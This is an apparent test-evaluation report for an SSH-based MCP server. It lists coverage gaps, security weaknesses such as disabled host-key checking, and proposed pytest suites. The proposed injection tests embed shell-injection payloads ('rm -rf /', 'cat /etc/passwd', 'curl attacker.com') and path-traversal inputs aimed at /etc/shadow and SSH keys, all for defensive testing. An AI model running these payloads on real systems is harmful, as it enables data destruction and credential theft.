TESTING_EVALUATION.md•36.2 kB
# Scout MCP Testing Strategy Evaluation Report
**Date:** 2025-11-28
**Framework:** pytest, pytest-asyncio, pytest-cov
**Python Version:** 3.11+
**Current Test Status:** 40/41 passing (97.6%)
---
## Executive Summary
The scout_mcp FastMCP server has a **solid foundation** with **81% overall code coverage** but exhibits critical gaps in:
1. **Security test coverage** - Missing command injection, path traversal, and timeout boundary tests
2. **Concurrency and pool management** - Missing multi-threaded access patterns and resource contention scenarios
3. **Error handling edge cases** - Insufficient coverage of connection failures, timeout scenarios, and state recovery
4. **Server-level integration** - Global state reset and error propagation patterns untested
### Current Test Pyramid
- **Unit Tests:** 24 tests (58%)
- **Integration Tests:** 7 tests (17%)
- **Contract/Ping Tests:** 10 tests (25%)
- **Ratio:** 58:17:25 (acceptable, could improve integration coverage)
---
## Coverage Analysis
### Overall Metrics
```
Module Stmts Miss Cover Status
─────────────────────────────────────────────────────
__init__.py 1 0 100% ✓ Complete
__main__.py 3 3 0% ✗ Not tested
config.py 85 0 100% ✓ Complete
executors.py 69 21 70% ⚠ Incomplete
ping.py 15 0 100% ✓ Complete
pool.py 56 12 79% ⚠ Incomplete
scout.py 20 0 100% ✓ Complete
server.py 86 27 69% ⚠ Incomplete
─────────────────────────────────────────────────────
TOTAL 335 63 81% ⚠ Acceptable
```
### Module-Specific Findings
#### ✓ Excellent Coverage (100%)
- **config.py** - Complete SSH config parsing, filtering, env var overrides
- **scout.py** - Target URI parsing thoroughly tested
- **ping.py** - Host connectivity checking tested
#### ⚠ Partial Coverage (70-79%)
**executors.py (70% - 21 lines uncovered)**
Missing lines:
```
Line 35 - bytes handling in stat_path() when stdout is bytes
Line 39 - Alternative stdout handling path
Line 48 - Non-directory/non-file type handling fallback
Line 70-75 - Error handling in cat_file() stderr processing
Line 79 - stdout=None case in cat_file()
Line 82 - Alternative stdout handling in cat_file()
Line 107-112 - Error handling in ls_dir() stderr processing
Line 116 - Alternative stdout in ls_dir()
Line 118 - stdout=None in ls_dir()
Line 140 - Alternative stdout in run_command()
Line 142 - stdout=None in run_command()
Line 149 - returncode None handling
Line 151 - CommandResult construction with None stderr
```
**Issue:** Test mocks use string returns, not testing bytes/None edge cases.
**pool.py (79% - 12 lines uncovered)**
Missing lines:
```
Line 74-78 - Cleanup loop termination logic (_cleanup_loop)
Line 82-92 - Lock-protected cleanup execution (_cleanup_idle)
```
**Issue:** Cleanup task lifecycle and concurrent access patterns not tested.
**server.py (69% - 27 lines uncovered)**
Missing lines:
```
Line 66 - No SSH hosts configured path
Line 82-83 - Connection failure exception handling
Line 99, 101 - Command stderr/returncode output formatting
Line 105-106 - Command execution exception handling
Line 111-112 - stat_path exception handling
Line 115 - Path not found case
Line 124 - Directory listing exception handling
Line 130-131 - File contents exception handling
Line 141-164 - list_hosts_resource() implementation completely untested
```
**Issue:** Multiple error paths and the hosts resource are not tested.
---
## Test Quality Analysis
### Assertion Density
```
Module Tests Assertions Avg/Test Status
────────────────────────────────────────────────────
scout.py 7 14 2.0 ⚠ Low
config.py 11 26 2.4 ⚠ Low
executors.py 8 16 2.0 ⚠ Low
pool.py 5 12 2.4 ⚠ Low
integration.py 7 18 2.6 ⚠ Low
ping.py 3 6 2.0 ⚠ Low
────────────────────────────────────────────────────
TOTAL 41 92 2.2 ⚠ Low
```
**Finding:** Most tests have only 2-3 assertions per test. Recommend 3-5+ assertions per test function to verify multiple behaviors.
### Test Isolation Issues
1. **Global state pollution** (test_integration.py)
- `reset_globals()` fixture reset `_config` and `_pool` but incomplete
- Missing cleanup of asyncio tasks spawned during pool operations
- Potential stale cleanup_task from previous tests
2. **Mock configuration issues** (test_executors.py)
- `test_cat_file_returns_contents` fails because mock doesn't match actual async behavior
- Mock returns raw string but actual `conn.run()` returns tuple `(output, incomplete)`
- **Test Failure Found:** AssertionError: `('file contents here', False) == 'file contents here'`
3. **Resource warning** (test_pool.py::test_close_all_connections)
- RuntimeWarning: coroutine 'AsyncMockMixin._execute_mock_call' was never awaited
- Mock `connection.close()` not properly awaited (asyncssh uses async close)
### Mock Usage Analysis
**Problems Identified:**
1. **Incomplete asyncssh mocking** - Real `asyncssh.SSHClientConnection.run()` returns SSHProcessResult with different interface than mocked MagicMock
2. **Missing stdout/stderr bytes handling** - Tests mock with strings, but real implementation can return bytes
3. **Async resource cleanup not mocked** - `connection.close()` is not async in mock but may be in real asyncssh
**Recommendation:** Use [pytest-asyncssh](https://github.com/ronf/asyncssh) fixtures or create proper async mocks using AsyncMock with spec.
---
## Critical Security Test Gaps
### Phase 2A Security Requirements - MISSING TESTS
#### 1. Command Injection Prevention (Security V-001)
**Status:** ✗ Not tested
```python
# Missing: Test that parameters are properly quoted
# Malicious payloads that MUST be prevented:
- "path'; rm -rf /; echo '"
- "path'; cat /etc/passwd #"
- "path' && curl attacker.com #"
```
**Test Gap:** No tests verify that shell quoting (e.g., `f'{path!r}'`) prevents injection.
**Current State:** Code uses `{path!r}` quoting but no tests validate this against payloads.
#### 2. Path Traversal Prevention (Security V-003)
**Status:** ✗ Not tested
```python
# Missing: Tests for path traversal attacks
- "../../../etc/passwd"
- "../../../../root/.ssh/authorized_keys"
- "/tmp/../../etc/shadow"
```
**Test Gap:** No tests validate that paths are restricted (no allowlist/blocklist in current code).
**Current State:** Code does NOT validate paths - ANY path accessible to SSH user can be accessed.
#### 3. SSH Host Key Verification (Security V-002)
**Status:** ⚠ Partially problematic
```python
# pool.py line 58
known_hosts=None, # <-- CRITICAL VULNERABILITY
```
**Finding:** Host key verification is DISABLED. Should use `known_hosts=True` or ~/.ssh/known_hosts.
**Test Status:** No tests verify host key checking behavior.
#### 4. Input Validation
**Status:** ⚠ Partial
- ✓ Target URI validation (test_scout.py covers this well)
- ✗ File size limits (max_file_size never tested)
- ✗ Path length limits (no boundary tests)
- ✗ Command length limits (no boundary tests)
#### 5. Timeout Enforcement
**Status:** ⚠ Partial
- ✗ Connection timeout tests (no timeout tests for `asyncssh.connect()`)
- ✗ Command timeout enforcement (timeout CLI wrapper used but not verified)
- ✗ Timeout boundary conditions (0s, very large values)
---
## Critical Performance Test Gaps
### Phase 2B Performance Requirements - MISSING TESTS
#### 1. Connection Pool Contention (Architecture Issue 15)
**Status:** ✗ Not tested
```python
# Missing: Concurrent requests to same host
- Multiple tasks requesting connection to same host simultaneously
- Race condition scenarios during cleanup
- Lock contention under high concurrency
```
**Gap:** `test_pool.py` does not test concurrent `get_connection()` calls.
#### 2. Concurrent Request Handling (Architecture Issue 16)
**Status:** ✗ Not tested
```python
# Missing: Parallel command execution
- 10+ concurrent scout() calls to different hosts
- 10+ concurrent scout() calls to same host
- Mixed concurrent operations (cat, ls, run commands)
- Resource exhaustion behavior
```
**Gap:** Integration tests use single sequential calls.
#### 3. Connection Pool Size Limits (Architecture Issue 10)
**Status:** ✗ Not tested
```python
# Missing: Pool size boundary tests
- Max connections limit (no limit currently implemented)
- Memory usage with large number of hosts
- Cleanup task memory leaks
```
**Gap:** Pool has unlimited connections - no backpressure mechanism.
#### 4. Resource Limit Enforcement
**Status:** ⚠ Partial
- ✓ File size limit (max_file_size used in cat_file)
- ✗ File size boundary tests (exact 1MB behavior)
- ✗ Total bandwidth limits (no tests)
- ✗ Connection timeout (no tests)
- ✗ Cleanup task resource management (untested)
#### 5. Memory Leak Prevention
**Status:** ⚠ Untested
```python
# Missing: Tests for cleanup_task lifecycle
- Task cancellation on shutdown
- Task memory cleanup after cancellation
- Connection closure guarantees
- Exception handling in async cleanup
```
**Current Issues:**
- cleanup_task stored as global reference - possible memory leak
- No guaranteed task cancellation on server shutdown
- Stale task reference if pool is recreated
---
## Identified Test Failures & Issues
### 1. CRITICAL: Test Failure in test_executors.py
**Test:** `test_cat_file_returns_contents`
**Failure:** AssertionError: `('file contents here', False) == 'file contents here'`
**Root Cause:** Mock does not match actual asyncssh.SSHClientConnection behavior
```python
# Current mock returns string directly:
mock_connection.run.return_value = MagicMock(stdout="file contents here")
# Actual asyncssh.run() returns tuple (output, incomplete):
# The test expects string but gets tuple
```
**Fix Required:** Update mock to properly simulate asyncssh behavior.
### 2. Resource Warning: test_pool.py
**Warning:** RuntimeWarning: coroutine 'AsyncMockMixin._execute_mock_call' was never awaited
**Root Cause:** `asyncssh.SSHClientConnection.close()` is async but mocked as sync
```python
# pool.py line 98
pooled.connection.close() # Should be: await pooled.connection.close()
# pool.py line 88
pooled.connection.close() # Same issue in cleanup
```
**Fix Required:** Either make mock async or update code to handle async close.
### 3. Incomplete Global State Reset
**Issue:** test_integration.py's `reset_globals()` fixture doesn't handle cleanup_task
```python
# Current
@pytest.fixture(autouse=True)
def reset_globals() -> None:
"""Reset global state before each test."""
server_module._config = None
server_module._pool = None # Task still running!
```
**Problem:** If pool had cleanup_task running, it's never cancelled. Can cause warnings about unawaited coroutines.
---
## Test Pyramid & Distribution Analysis
### Current Distribution (41 tests)
```
Module Tests Type
─────────────────────────────────────────────────────
test_scout.py 7 Unit (70%)
test_config.py 11 Unit (90%)
test_executors.py 8 Unit (90%)
test_pool.py 5 Unit (70%)
test_ping.py 3 Unit (100%)
test_integration.py 7 Integration (30%)
─────────────────────────────────────────────────────
Unit Tests 34 83%
Integration Tests 7 17%
```
### Ideal Pyramid (by test automation best practices)
```
e2e Tests 5-10% |
Integration Tests 20-30% |__
Unit Tests 60-70% |___
```
**Status:** ✓ Ratio is acceptable (34 unit / 7 integration = 82.9% / 17.1%)
**However:** Integration tests are too simple - no error scenarios, no edge cases.
---
## Security Vulnerabilities Without Tests
| ID | Vulnerability | Severity | Test Coverage |
|----|----|----------|----------|
| V-001 | Command Injection in executors | HIGH | ✗ None |
| V-002 | SSH Host Key Verification Disabled | CRITICAL | ✗ None |
| V-003 | Path Traversal Not Validated | HIGH | ✗ None |
| V-004 | No Max Connection Limit | MEDIUM | ✗ None |
| V-005 | Timeout Boundary Tests | MEDIUM | ✗ None |
| V-006 | File Size Boundary | LOW | ✗ None |
---
## Performance Issues Without Tests
| ID | Issue | Impact | Test Coverage |
|----|-------|--------|----------|
| P-001 | Pool Contention (Concurrent Access) | HIGH | ✗ None |
| P-002 | Cleanup Task Lifecycle | HIGH | ✗ None |
| P-003 | Memory Leak in Global Pool | MEDIUM | ✗ None |
| P-004 | Connection Timeout Verification | MEDIUM | ✗ None |
| P-005 | Large File Handling | MEDIUM | ⚠ Partial |
| P-006 | Concurrent Request Limits | MEDIUM | ✗ None |
---
## Recommended Testing Improvements
### Priority 1: Critical Security & Stability (Implement First)
#### 1.1 Fix Existing Test Failure
```python
# tests/test_executors.py - Fix mock to return correct type
@pytest.mark.asyncio
async def test_cat_file_returns_contents(mock_connection: AsyncMock) -> None:
"""cat_file returns file contents from mock SSHClientConnection."""
# Create result that matches asyncssh.run() return type
mock_result = AsyncMock()
mock_result.stdout = "file contents here"
mock_result.returncode = 0
mock_connection.run.return_value = mock_result
result = await cat_file(mock_connection, "/etc/hosts", max_size=1024)
assert result == "file contents here"
```
#### 1.2 Security: Command Injection Prevention Tests
**File:** tests/test_security_injection.py
```python
"""Tests for command injection prevention."""
@pytest.mark.asyncio
async def test_stat_path_prevents_command_injection(mock_connection: AsyncMock) -> None:
"""stat_path uses proper quoting to prevent shell injection."""
# Attempt injection payload
payload = "test'; rm -rf /; echo '"
# Call should properly quote the path
await stat_path(mock_connection, payload)
# Verify the command contains quoted path
called_command = mock_connection.run.call_args[0][0]
assert f'{payload!r}' in called_command # Verify proper quoting
assert "; rm -rf" not in called_command # Injection prevented
@pytest.mark.asyncio
async def test_cat_file_prevents_command_injection(mock_connection: AsyncMock) -> None:
"""cat_file uses proper quoting to prevent shell injection."""
payload = "file'; curl attacker.com; echo '"
await cat_file(mock_connection, payload, max_size=1024)
called_command = mock_connection.run.call_args[0][0]
assert f'{payload!r}' in called_command
assert "curl" not in called_command
@pytest.mark.asyncio
async def test_run_command_prevents_working_dir_injection(mock_connection: AsyncMock) -> None:
"""run_command properly quotes working directory."""
malicious_dir = "/tmp'; curl attacker.com; echo '"
mock_connection.run.return_value = AsyncMock(
stdout="", stderr="", returncode=0
)
await run_command(mock_connection, malicious_dir, "ls", timeout=30)
called_command = mock_connection.run.call_args[0][0]
assert f'{malicious_dir!r}' in called_command
assert "curl" not in called_command
```
#### 1.3 Security: SSH Host Key Verification Tests
**File:** tests/test_security_ssh.py
```python
"""Tests for SSH security features."""
@pytest.mark.asyncio
async def test_connection_verifies_known_hosts(mock_ssh_host: SSHHost) -> None:
"""Connection establishment should verify known hosts."""
pool = ConnectionPool(idle_timeout=60)
with patch("asyncssh.connect", new_callable=AsyncMock) as mock_connect:
mock_conn = AsyncMock()
mock_conn.is_closed = False
mock_connect.return_value = mock_conn
await pool.get_connection(mock_ssh_host)
# Verify known_hosts parameter is NOT None
call_kwargs = mock_connect.call_args[1]
assert call_kwargs["known_hosts"] is not None, \
"Host key verification should be enabled (known_hosts != None)"
@pytest.mark.asyncio
async def test_missing_known_hosts_raises_warning(mock_ssh_host: SSHHost) -> None:
"""Verify current implementation has known_hosts security issue."""
# This test documents the current vulnerability
pool = ConnectionPool(idle_timeout=60)
with patch("asyncssh.connect", new_callable=AsyncMock) as mock_connect:
mock_conn = AsyncMock()
mock_conn.is_closed = False
mock_connect.return_value = mock_conn
await pool.get_connection(mock_ssh_host)
call_kwargs = mock_connect.call_args[1]
# Currently this passes (vulnerability)
assert call_kwargs["known_hosts"] is None, \
"BUG: Host key verification is disabled!"
```
#### 1.4 Fix Resource Warning in Pool Tests
**File:** tests/test_pool.py
```python
@pytest.mark.asyncio
async def test_close_all_connections(mock_ssh_host: SSHHost) -> None:
"""close_all closes all pooled connections."""
pool = ConnectionPool(idle_timeout=60)
mock_conn = AsyncMock()
mock_conn.is_closed = False
# Make close() an async mock
mock_conn.close = AsyncMock()
with patch("asyncssh.connect", new_callable=AsyncMock) as mock_connect:
mock_connect.return_value = mock_conn
await pool.get_connection(mock_ssh_host)
await pool.close_all()
# Verify close was called (now async-aware)
mock_conn.close.assert_called_once()
```
### Priority 2: Concurrency & Performance Tests (Implement Second)
#### 2.1 Connection Pool Contention Tests
**File:** tests/test_pool_concurrency.py
```python
"""Tests for pool concurrent access patterns."""
@pytest.mark.asyncio
async def test_concurrent_requests_same_host(mock_ssh_host: SSHHost) -> None:
"""Multiple concurrent requests to same host reuse single connection."""
pool = ConnectionPool(idle_timeout=60)
mock_conn = AsyncMock()
mock_conn.is_closed = False
with patch("asyncssh.connect", new_callable=AsyncMock) as mock_connect:
mock_connect.return_value = mock_conn
# Launch 10 concurrent requests
tasks = [
pool.get_connection(mock_ssh_host)
for _ in range(10)
]
connections = await asyncio.gather(*tasks)
# All should return same connection
assert all(c == mock_conn for c in connections)
# Only one connection created
assert mock_connect.call_count == 1
@pytest.mark.asyncio
async def test_cleanup_task_does_not_race(mock_ssh_host: SSHHost) -> None:
"""Cleanup task should not race with get_connection."""
pool = ConnectionPool(idle_timeout=1) # 1 second timeout
mock_conn = AsyncMock()
mock_conn.is_closed = False
with patch("asyncssh.connect", new_callable=AsyncMock) as mock_connect:
mock_connect.return_value = mock_conn
# Get connection
conn1 = await pool.get_connection(mock_ssh_host)
assert conn1 is not None
# Wait for cleanup
await asyncio.sleep(1.5)
# Request again - should handle stale connection
conn2 = await pool.get_connection(mock_ssh_host)
assert conn2 is not None
# No crashes, proper handling of stale state
@pytest.mark.asyncio
async def test_pool_respects_max_connections() -> None:
"""Pool should enforce reasonable connection limits."""
# NOTE: Current implementation has no limit - this test documents issue
pool = ConnectionPool(idle_timeout=60)
# Create 100 hosts
hosts = [
SSHHost(name=f"host{i}", hostname=f"192.168.1.{i}", user="test")
for i in range(100)
]
mock_conn = AsyncMock()
mock_conn.is_closed = False
with patch("asyncssh.connect", new_callable=AsyncMock) as mock_connect:
mock_connect.return_value = mock_conn
# Connect to all 100 hosts
tasks = [pool.get_connection(host) for host in hosts]
await asyncio.gather(*tasks)
# Pool should have 100 connections (unlimited currently)
assert len(pool._connections) == 100
# FIXME: Should implement max_connections limit
```
#### 2.2 Timeout Enforcement Tests
**File:** tests/test_timeout.py
```python
"""Tests for timeout enforcement."""
@pytest.mark.asyncio
async def test_connection_timeout_boundary() -> None:
"""Connection respects timeout parameter."""
from mcp_cat.pool import ConnectionPool
# Test with very short timeout
pool = ConnectionPool(idle_timeout=1)
host = SSHHost(name="slow", hostname="example.com", user="test")
with patch("asyncssh.connect", new_callable=AsyncMock) as mock_connect:
# Simulate slow connection
async def slow_connect(*args, **kwargs):
await asyncio.sleep(5)
mock_connect.side_effect = slow_connect
# Connection should timeout
with pytest.raises(asyncio.TimeoutError):
await asyncio.wait_for(
pool.get_connection(host),
timeout=0.5
)
@pytest.mark.asyncio
async def test_run_command_timeout_enforcement(mock_connection: AsyncMock) -> None:
"""run_command enforces timeout parameter."""
from mcp_cat.executors import run_command
mock_connection.run.return_value = AsyncMock(
stdout="output", stderr="", returncode=0
)
result = await run_command(
mock_connection,
"/tmp",
"sleep 100",
timeout=5
)
# Verify command includes timeout wrapper
called_command = mock_connection.run.call_args[0][0]
assert "timeout 5" in called_command
assert "sleep 100" in called_command
@pytest.mark.asyncio
async def test_cat_file_with_timeout(mock_connection: AsyncMock) -> None:
"""cat_file respects timeout for large files."""
from mcp_cat.executors import cat_file
# Simulate large file read timeout
mock_connection.run = AsyncMock(side_effect=asyncio.TimeoutError())
with pytest.raises(asyncio.TimeoutError):
await cat_file(mock_connection, "/huge/file", max_size=1_048_576)
```
#### 2.3 File Size Boundary Tests
**File:** tests/test_boundaries.py
```python
"""Tests for boundary conditions."""
@pytest.mark.asyncio
async def test_cat_file_respects_exact_max_size() -> None:
"""cat_file uses exact max_size boundary."""
from mcp_cat.executors import cat_file
mock_conn = AsyncMock()
# Test various sizes
test_sizes = [1024, 1_048_576, 10_485_760, 104_857_600]
for size in test_sizes:
mock_conn.run.return_value = AsyncMock(
stdout="x" * min(size, 100),
returncode=0
)
await cat_file(mock_conn, "/file", max_size=size)
# Verify head -c uses correct size
called_command = mock_conn.run.call_args[0][0]
assert f"head -c {size}" in called_command
@pytest.mark.asyncio
async def test_stat_path_with_special_characters(mock_conn: AsyncMock) -> None:
"""stat_path handles special characters in path."""
from mcp_cat.executors import stat_path
special_paths = [
"/path with spaces/file.txt",
"/path/with'quotes/file",
"/path/with\"doublequotes/file",
"/path/with$special/chars",
"/path/with`backticks`/file",
]
for path in special_paths:
mock_conn.run.return_value = AsyncMock(
stdout="regular file", returncode=0
)
result = await stat_path(mock_conn, path)
# Should return file type without error
assert result in ["file", "directory", None]
# Verify path is properly quoted
called_command = mock_conn.run.call_args[0][0]
# Path should be in repr form (quoted)
assert repr(path)[1:-1] in called_command or path in called_command
```
### Priority 3: Error Handling & Edge Cases (Implement Third)
#### 3.1 Server Error Path Coverage
**File:** tests/test_server_errors.py
```python
"""Tests for server error handling."""
@pytest.mark.asyncio
async def test_scout_connection_failure_handling(mock_ssh_config: Path) -> None:
"""scout handles SSH connection failures gracefully."""
from mcp_cat.config import Config
import mcp_cat.server as server_module
server_module._config = Config(ssh_config_path=mock_ssh_config)
with patch("asyncssh.connect", new_callable=AsyncMock) as mock_connect:
mock_connect.side_effect = OSError("Connection refused")
result = await scout_fn("testhost:/etc/hosts")
assert "Error" in result
assert "Cannot connect" in result
@pytest.mark.asyncio
async def test_scout_stat_path_failure(mock_ssh_config: Path) -> None:
"""scout handles stat_path failures."""
import mcp_cat.server as server_module
from mcp_cat.config import Config
server_module._config = Config(ssh_config_path=mock_ssh_config)
mock_conn = AsyncMock()
mock_conn.is_closed = False
mock_conn.run.side_effect = Exception("Permission denied")
with patch("asyncssh.connect", return_value=mock_conn):
result = await scout_fn("testhost:/root/.ssh/id_rsa")
assert "Error" in result
assert "Cannot stat" in result
@pytest.mark.asyncio
async def test_scout_cat_file_permission_error(mock_ssh_config: Path) -> None:
"""scout handles file read permission errors."""
import mcp_cat.server as server_module
from mcp_cat.config import Config
server_module._config = Config(ssh_config_path=mock_ssh_config)
mock_conn = AsyncMock()
mock_conn.is_closed = False
# stat succeeds (file exists)
# cat fails (permission denied)
mock_conn.run.side_effect = [
AsyncMock(stdout="regular file", returncode=0), # stat
AsyncMock(stderr="Permission denied", returncode=13), # cat fails
]
with patch("asyncssh.connect", return_value=mock_conn):
result = await scout_fn("testhost:/root/.ssh/config")
assert "Error" in result or "Permission" in result
@pytest.mark.asyncio
async def test_scout_command_timeout(mock_ssh_config: Path) -> None:
"""scout handles command timeouts."""
import mcp_cat.server as server_module
from mcp_cat.config import Config
server_module._config = Config(ssh_config_path=mock_ssh_config)
mock_conn = AsyncMock()
mock_conn.is_closed = False
mock_conn.run.side_effect = asyncio.TimeoutError()
with patch("asyncssh.connect", return_value=mock_conn):
result = await scout_fn("testhost:/path", "sleep 1000")
assert "Error" in result or "timeout" in result.lower()
```
#### 3.2 Executor Error Cases
**File:** tests/test_executor_errors.py
```python
"""Tests for executor error handling."""
@pytest.mark.asyncio
async def test_cat_file_permission_denied(mock_connection: AsyncMock) -> None:
"""cat_file reports permission errors."""
from mcp_cat.executors import cat_file
mock_connection.run.return_value = AsyncMock(
stdout="",
stderr="Permission denied",
returncode=13
)
with pytest.raises(RuntimeError, match="Failed to read"):
await cat_file(mock_connection, "/root/.ssh/id_rsa", max_size=1024)
@pytest.mark.asyncio
async def test_ls_dir_nonexistent(mock_connection: AsyncMock) -> None:
"""ls_dir reports when directory not found."""
from mcp_cat.executors import ls_dir
mock_connection.run.return_value = AsyncMock(
stdout="",
stderr="No such file or directory",
returncode=2
)
with pytest.raises(RuntimeError, match="Failed to list"):
await ls_dir(mock_connection, "/nonexistent/path")
@pytest.mark.asyncio
async def test_stat_path_with_bytes_output(mock_connection: AsyncMock) -> None:
"""stat_path handles bytes output from remote."""
from mcp_cat.executors import stat_path
# asyncssh might return bytes
mock_connection.run.return_value = AsyncMock(
stdout=b"regular file", # bytes, not str
returncode=0
)
result = await stat_path(mock_connection, "/etc/hosts")
assert result == "file"
@pytest.mark.asyncio
async def test_cat_file_with_utf8_errors(mock_connection: AsyncMock) -> None:
"""cat_file handles invalid UTF-8 gracefully."""
from mcp_cat.executors import cat_file
# Binary file with invalid UTF-8
mock_connection.run.return_value = AsyncMock(
stdout=b"\x80\x81\x82\x83",
returncode=0
)
result = await cat_file(mock_connection, "/binary/file", max_size=1024)
# Should not raise, should use replacement characters
assert isinstance(result, str)
assert len(result) > 0
```
#### 3.3 Integration Error Scenarios
**File:** tests/test_integration_errors.py
```python
"""Tests for end-to-end error scenarios."""
@pytest.mark.asyncio
async def test_scout_hosts_no_config(monkeypatch: pytest.MonkeyPatch) -> None:
"""scout('hosts') with no SSH config."""
import mcp_cat.server as server_module
from mcp_cat.config import Config
monkeypatch.setattr(server_module, "_config", None)
monkeypatch.setattr(server_module, "_pool", None)
# Create config with nonexistent file
config = Config(ssh_config_path=Path("/nonexistent/.ssh/config"))
server_module._config = config
result = await scout_fn("hosts")
assert "No SSH hosts" in result or result == "No SSH hosts configured."
@pytest.mark.asyncio
async def test_scout_list_hosts_resource() -> None:
"""list_hosts_resource returns formatted host list."""
import mcp_cat.server as server_module
from mcp_cat.config import Config
from pathlib import Path
# Create temporary SSH config
ssh_config = Path("/tmp/test_ssh_config")
ssh_config.write_text("""
Host online_host
HostName 192.168.1.1
User testuser
Host offline_host
HostName 192.168.1.99
User testuser
""")
server_module._config = Config(ssh_config_path=ssh_config)
server_module._pool = None
from mcp_cat.server import list_hosts_resource
result = await list_hosts_resource()
assert "Available SSH hosts" in result
assert "online_host" in result
assert "offline_host" in result
ssh_config.unlink()
```
### Priority 4: Refactor Test Infrastructure (Implement Fourth)
#### 4.1 Create Proper Async Mock Fixtures
**File:** tests/conftest.py
```python
"""Shared test fixtures and utilities."""
import pytest
from unittest.mock import AsyncMock, MagicMock
from pathlib import Path
from mcp_cat.config import SSHHost
import asyncssh
@pytest.fixture
def mock_ssh_host() -> SSHHost:
"""Create a mock SSH host."""
return SSHHost(
name="testhost",
hostname="192.168.1.100",
user="testuser",
port=22,
)
@pytest.fixture
def mock_ssh_connection() -> AsyncMock:
"""Create a proper mock asyncssh.SSHClientConnection."""
conn = AsyncMock(spec=asyncssh.SSHClientConnection)
conn.is_closed = False
conn.close = AsyncMock()
# Make run() return proper SSHProcessResult-like object
run_result = AsyncMock()
run_result.stdout = None
run_result.stderr = None
run_result.returncode = 0
conn.run.return_value = run_result
return conn
@pytest.fixture
def mock_ssh_config(tmp_path: Path) -> Path:
"""Create a temporary SSH config file."""
config_file = tmp_path / "ssh_config"
config_file.write_text("""
Host testhost
HostName 192.168.1.100
User testuser
Port 22
Host production
HostName 10.0.0.1
User deploy
Port 2222
IdentityFile ~/.ssh/id_rsa
""")
return config_file
@pytest.fixture(autouse=True)
def cleanup_globals() -> None:
"""Clean up global server state before and after each test."""
import mcp_cat.server as server_module
# Cleanup before test
if hasattr(server_module, "_pool") and server_module._pool:
if hasattr(server_module._pool, "_cleanup_task"):
task = server_module._pool._cleanup_task
if task and not task.done():
task.cancel()
server_module._config = None
server_module._pool = None
yield
# Cleanup after test
if hasattr(server_module, "_pool") and server_module._pool:
if hasattr(server_module._pool, "_cleanup_task"):
task = server_module._pool._cleanup_task
if task and not task.done():
task.cancel()
server_module._config = None
server_module._pool = None
```
---
## Implementation Roadmap
### Phase 1: Fix Existing Issues (Estimated: 2-4 hours)
1. Fix `test_cat_file_returns_contents` mock failure
2. Fix resource warning in pool tests
3. Create conftest.py with proper fixtures
4. Fix global state cleanup in integration tests
### Phase 2: Add Security Tests (Estimated: 4-6 hours)
1. Command injection prevention tests
2. SSH host key verification tests
3. Input validation boundary tests
4. Timeout enforcement tests
### Phase 3: Add Performance/Concurrency Tests (Estimated: 4-6 hours)
1. Concurrent pool access tests
2. Cleanup task lifecycle tests
3. Memory leak prevention tests
4. Resource contention tests
### Phase 4: Add Error Handling Coverage (Estimated: 3-4 hours)
1. Server error path tests
2. Executor error cases
3. Integration error scenarios
4. Edge case boundary testing
### Phase 5: Refactoring & Documentation (Estimated: 2-3 hours)
1. Create test utilities and helpers
2. Update CI/CD with coverage enforcement
3. Document testing strategy
4. Create contribution guidelines
**Total Estimated Effort:** 15-23 hours for comprehensive test coverage
---
## CI/CD Recommendations
### 1. Add Coverage Enforcement
```yaml
# .github/workflows/test.yml
- name: Check coverage threshold
run: |
pytest --cov=scout_mcp/mcp_cat --cov-report=term-missing
coverage report --fail-under=85
```
### 2. Add Security Scanning
```yaml
- name: Security scan
run: |
pip install bandit
bandit -r scout_mcp/mcp_cat
```
### 3. Add Concurrency Testing
```yaml
- name: Run with different asyncio implementations
run: |
PYTHONPATH=. pytest tests/ -v --asyncio-mode=strict
```
---
## Test Metrics Dashboard Goals
| Metric | Current | Target | Timeline |
|--------|---------|--------|----------|
| Overall Coverage | 81% | 90%+ | 2 weeks |
| Security Tests | 0% | 100% | 1 week |
| Concurrency Tests | 0% | 100% | 2 weeks |
| Error Path Coverage | 69% | 95%+ | 1.5 weeks |
| Test Count | 41 | 75+ | 2 weeks |
| Avg Assertions/Test | 2.2 | 3.5+ | 1 week |
| Flaky Tests | 2 | 0 | Immediate |
---
## Conclusion
The scout_mcp test suite provides **solid foundational coverage** but has **critical gaps** in:
1. **Security testing** - No validation of injection prevention or host key verification
2. **Concurrency testing** - No tests for resource contention or race conditions
3. **Error handling** - Missing coverage for connection failures and edge cases
4. **Integration testing** - Too simple, no error scenarios
**Immediate Actions Required:**
- Fix test failure in `test_cat_file_returns_contents`
- Add command injection prevention tests (CRITICAL SECURITY)
- Fix SSH host key verification vulnerability (CRITICAL SECURITY)
- Add concurrent access tests for connection pool
**Recommended Test Additions:** 35-40 new tests across security, concurrency, and error scenarios.
---
**Report Generated:** 2025-11-28 19:45 UTC
**By:** Test Automation Engineer
**Confidence Level:** High (based on comprehensive coverage analysis)